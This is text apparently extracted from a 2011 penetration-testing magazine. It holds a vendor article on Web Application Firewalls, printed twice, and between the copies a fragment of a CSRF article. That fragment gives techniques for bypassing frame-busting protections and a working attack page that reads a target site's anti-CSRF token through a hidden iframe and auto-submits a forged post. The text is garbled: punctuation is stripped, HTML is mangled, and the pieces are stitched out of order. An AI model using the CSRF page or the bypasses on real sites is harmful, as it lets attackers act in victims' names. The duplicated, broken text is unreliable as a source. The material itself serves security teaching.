internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
